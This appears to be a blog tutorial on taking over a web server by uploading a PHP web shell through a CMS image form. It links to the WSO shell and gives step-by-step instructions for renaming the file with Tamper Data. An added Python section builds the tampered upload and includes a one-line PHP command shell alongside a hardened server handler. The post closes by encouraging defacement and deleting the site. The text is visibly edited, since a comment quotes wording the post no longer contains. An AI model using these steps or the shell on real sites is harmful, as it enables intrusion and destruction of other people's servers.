Using CMS Upload and Tamper Data to Obtain Administrative Access to a Webserver

March 9, 2017 | Views: 5125


So, you’ve done it. You have either bypassed a CMS login or used SQL injection to pull usernames and password hashes out of the CMS database, and you have cracked the hashes.

You are inside the system.

What do you do now?

The next logical step is privilege escalation: turning administrative access to the CMS into code execution on the web server itself.

I like to use the WSO.php backdoor, a PHP web shell, to obtain further access. (The shell is located here: https://github.com/tennc/webshell/blob/master/xakep-shells/PHP/wso.txt)

Now, it is important to understand that most Content Management Systems are designed NOT to let you upload .php files to the server through the CMS administrative panel: the upload form only accepts an allow-list of image extensions. There is a way to defeat these “protections” however, whenever the server trusts the filename it receives, either because the extension check lives only in the browser’s JavaScript or because the server looks at the Content-Type header rather than the name. I accomplish this through the use of the Tamper Data browser add-on, which pauses each outgoing request and lets you edit it before it is sent. Tamper Data itself is a Firefox add-on; the Chrome equivalent, Tamper Chrome, is at: https://chrome.google.com/webstore/detail/tamper-chrome-extension/hifhgpdkfodlpnlmlnmhchnkepplebkb?hl=en

The method is very simple:
The upload itself is a multipart/form-data POST request, and the name the server will store the file under travels in the Content-Disposition header of the file part, not in the GET request that loaded the upload form. You let the browser’s own check pass by choosing a file that ends in .jpeg, then, before the POST leaves your machine, you REMOVE the .jpeg extension from that filename so that you have in fact uploaded your shell as a .php file, not a .jpeg file.

Proof of Concept Steps:

  1. Rename your shell as follows: shell.php.jpeg.
  2. Open the Tamper Data plugin.
  3. Browse to the CMS section that will allow you to upload a photo.
  4. Select shell.php.jpeg in the upload form, but DO NOT submit the request to upload yet!
  5. In the Tamper Data plugin, click Start Tamper.
  6. On the CMS form, submit the request to upload shell.php.jpeg.
  7. Tamper Data will now prompt you for every outgoing request. Click “Tamper” with “Continue Tampering” checked on the popup window so that you can inspect each one.
  8. You are looking for the window that shows the POST request carrying shell.php.jpeg (it follows the GET request that loaded the form); the filename sits in the Content-Disposition header of the multipart body.
  9. In that POST request, edit the file name from shell.php.jpeg to shell.php and let the request go. The file WILL NOT execute unless the web server maps its extension to the PHP handler, so it must end in .php!
  10. After the shell is uploaded, navigate to the shell’s location in your browser; the upload directory varies from CMS to CMS, and the upload response or the media library usually reveals the path.
    Enjoy administrative access to the site!

Two caveats before you celebrate. The shell runs as the web server’s own account (www-data, apache or similar), not as root, so what you have is administrative access to the site, and a separate local privilege escalation is needed for the host itself. And the trick only works when the upload directory allows PHP execution and the server keeps the filename you supplied; a CMS that validates the extension and content server-side and renames uploads itself will reject or neutralise the file.
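To make the filename-rewriting step concrete, here is an added example in Python; it is not part of the original post, and it is neither the WSO shell nor any particular CMS’s code. It builds the multipart POST body a browser sends for shell.php.jpeg, rewrites the filename the way step 9 has you do by hand in Tamper Data, and then runs the result through a naive server-side handler that trusts the name and a hardened one that does not. The field name `photo`, the boundary string, and the one-line PHP payload are constructed stand-ins.

```python
import re
import secrets

# Constructed sample data (assumptions for this example, not the WSO shell or a real CMS):
PHP_SHELL = b"<?php system($_GET['c']); ?>"          # stand-in for wso.php
JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 12      # start of a JFIF file
POLYGLOT = JPEG_HEADER + PHP_SHELL                    # real JPEG magic bytes, PHP after them

BOUNDARY = "----WebKitFormBoundaryExample1234"        # browsers choose a random one
FIELD = "photo"                                       # assumed name of the CMS file input

ALLOWED_EXT = {"jpeg", "jpg", "png", "gif"}
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def build_upload_body(filename, content, field=FIELD, boundary=BOUNDARY):
    """Build the multipart/form-data body the browser POSTs for one file input.
    The name the server will use is in the Content-Disposition header, so a
    browser-side extension check on shell.php.jpeg has already passed by now."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: image/jpeg\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def tamper_filename(body, old, new):
    """Step 9 of the post done programmatically: rewrite the filename in the
    paused request before it leaves for the server."""
    return body.replace(f'filename="{old}"'.encode(), f'filename="{new}"'.encode(), 1)


def parse_upload(body, boundary=BOUNDARY):
    """Server side: recover (filename, file bytes) from the multipart body."""
    m = re.search(rb'filename="([^"]*)"', body)
    if m is None:
        raise ValueError("no file part in body")
    start = body.index(b"\r\n\r\n", m.end()) + 4
    end = body.index(f"\r\n--{boundary}--".encode(), start)
    return m.group(1).decode(), body[start:end]


def naive_store(body):
    """Vulnerable handler: the only filter was in the browser, so the server
    saves the file under whatever name the request carries. Returns that name."""
    filename, _content = parse_upload(body)
    return filename


def hardened_store(body):
    """Hardened handler: allow-list the extension, require matching magic bytes,
    and choose the stored name server-side so nothing from the request (including
    an embedded ".php") reaches the filesystem. Returns the stored name or None."""
    filename, content = parse_upload(body)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return None
    kind = next((k for magic, k in MAGIC.items() if content.startswith(magic)), None)
    if kind is None or kind != ("jpeg" if ext == "jpg" else ext):
        return None
    return f"{secrets.token_hex(16)}.{kind}"


if __name__ == "__main__":
    browser_body = build_upload_body("shell.php.jpeg", PHP_SHELL)
    tampered = tamper_filename(browser_body, "shell.php.jpeg", "shell.php")
    print("naive server stores:   ", naive_store(tampered))      # shell.php, executable
    print("hardened server stores:", hardened_store(tampered))   # None, extension rejected
    print("hardened, JPEG/PHP polyglot:",
          hardened_store(build_upload_body("shell.php.jpeg", POLYGLOT)))  # random .jpeg name
```

The hardened handler discards the client’s name even for files that pass, and that matters beyond the tampering shown here: on an Apache host configured with `AddHandler application/x-httpd-php .php`, a file stored as shell.php.jpeg is executed as PHP with no tampering at all, and a JPEG with PHP appended after its magic bytes passes the content check. A server-chosen name, stored under a directory where PHP execution is disabled, closes both paths.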

From the shell, you can do things such as change the website’s index page to your defacement page, delete everything, or even just show your friends and tell them how awesome you are!

5 Comments
  1. Wonderful! Thank you!

  2. Very basic but good trick that people should be aware of.
    However, in your post I’ve noticed this ‘decrypted the hashes’. Hashing is a one-way algorithm, you can’t decrypt a hash. You need to crack it.

    https://en.wikipedia.org/wiki/Cryptographic_hash_function
